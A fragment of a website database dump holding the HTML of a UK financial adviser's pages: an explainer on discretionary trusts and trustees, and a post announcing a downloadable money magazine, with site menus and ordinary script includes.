menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-111 current_page_item menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Discretionary Trusts										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/trusts\" title=\"Trusts\">Trusts</a></li><li>Discretionary Trusts</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-111\" class=\"post-111 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Discretionary Trusts</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p/>&#13;\n<h4>Discretionary trusts ensure that loved ones left behind will be taken care of.</h4>&#13;\n<p>Discretionary trusts commit the trustee, whether that should be a company or an individual, to handle the assets of a deceased person for the benefit of the beneficiaries. These assets usually take the form of finance or property.</p>&#13;\n<p>The trustees, those who are charged with handling the discretionary trusts, also have the legal discretion of how they are distributed. The trusts may also accumulate income to increase the benefit to the beneficiaries.</p>&#13;\n<p>As part of the trustee’s role, they may decide:</p>&#13;\n<ul><li>How much money is paid out and to whom.</li>&#13;\n<li>The regularity of the payments may also be decided by them as well as any conditions which may have to be met.</li>&#13;\n<li>There may, in some circumstances, be situations where some income may be used by the trustees for the benefit of the beneficiaries.</li>&#13;\n</ul><p>The essential role of a trustee is to carry out the wishes of the person who has set up and put assets into the trust. They are subsequently known as the ‘settlor’. This person’s wishes are usually recorded in either their will, or a trust deed.</p>&#13;\n<p>Trusts are often used to ascertain that the assets of the deceased are left to the person or persons that they have requested. This enables them to protect family assets such as property and jewellery. If a trust is to be set up, as requested in a will or trust deed, this allows assets to be distributed as requested after the person has died.</p>&#13;\n<p>There are many reasons for setting up a trust.</p>&#13;\n<ul><li>In the case of a minor being the beneficiary of a deceased’s assets, a trust can protect the money until they are old enough to be responsible for it.</li>&#13;\n<li>This age is sometimes specified in the will and may be over the age of eighteen.</li>&#13;\n<li>The same applies if a person is deemed not to be of sound mind to inherit the assets for their own use. The trust can provide for their well being from the funds therein.</li>&#13;\n</ul><p>The trust deed can also set out the terms and conditions regarding the extent of the role of the trustee. In some instances, the settlor, the person who has set up the trust, will set some capital aside for future unknown events such as for a grandchild’s future.</p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/trusts\" title=\"Back to Parent Page\">Trusts</a></li>&#13;\n						<li class=\"page_item page-item-109\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n<li class=\"page_item page-item-106\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n<li class=\"page_item page-item-111 current_page_item\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n<li class=\"page_item page-item-141\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n<li class=\"page_item page-item-144\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Discretionary Trusts and Trustee\'s','Discretionary Trusts ensure that loved ones left behind will be taken care of. Our trust service covers the important things you must consider...','publish','closed','closed','','discretionary-trusts-and-trustees','','','2017-09-21 16:34:29','2017-09-21 16:34:29','',0,'http://www.equalitywalk.org.uk/discretionary-trusts-and-trustees',0,'page','',0),(62,1,'2017-09-21 16:34:29','2017-09-21 16:34:29','<body class=\"single single-post postid-7258 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										eSmart Money January/February 2017 issue										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>eSmart Money January/February 2017 issue</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-7258\" class=\"post-7258 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">eSmart Money January/February 2017 issue</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div>&#13;\n<h3 class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We hope the latest issue of our magazine brings you financial inspiration at the start of the New Year.</span></span></span>&#13;\n</h3><p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Click here for your FREE download <span style=\"color: #0000ff;\"><a href=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/08/Smart-Money-Jan-Dec-2014.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/wp-content/uploads/2013/08/Smart-Money-Jan-Dec-2014.pdf\']);\"><span style=\"color: #0000ff;\">Smart Money Jan – Dec 2017</span></a> </span> </span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Now is the perfect time to re-evaluate your current financial planning provision and, in particular, if you are making high levels of pension contributions you need to make sure that you know whether you will be affected by the impending new lifetime allowance (LTA) limit changes.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">On page 06 we look at why thousands of pension savers could be impacted by the forthcoming changes unless they act swiftly.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It has been a torrid time for cash savers over the past five years. The Bank of England base rate has been on hold at its 300-year low of 0.5% since March 2009.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Even though there have been murmurings of a possible rise in interest rates on the horizon, on page 10 we consider some alternatives to explore to generate a return from your savings.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">No one likes to pay more tax than they have to but one of the challenges of holding wealth is the high taxation it attracts.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">With real-terms tax increases the prospect for the foreseeable future, the pressure is on to make the most of every available tax-planning opportunity. Turn to page 29 to read all about it.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">A list of the articles featured in this edition appears on page 03.</span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 10pt;\"><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Click Here for your FREE Download  <span style=\"color: #0000ff;\"><a href=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/08/Smart-Money-Jan-Dec-2014.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/wp-content/uploads/2013/08/Smart-Money-Jan-Dec-2014.pdf\']);\"><span style=\"color: #0000ff;\">Smart Money Jan – Dec 2017</span></a></span></span></span></span></p>&#13;\n<p class=\"MsoNormal\" style=\"margin: 0cm 0cm 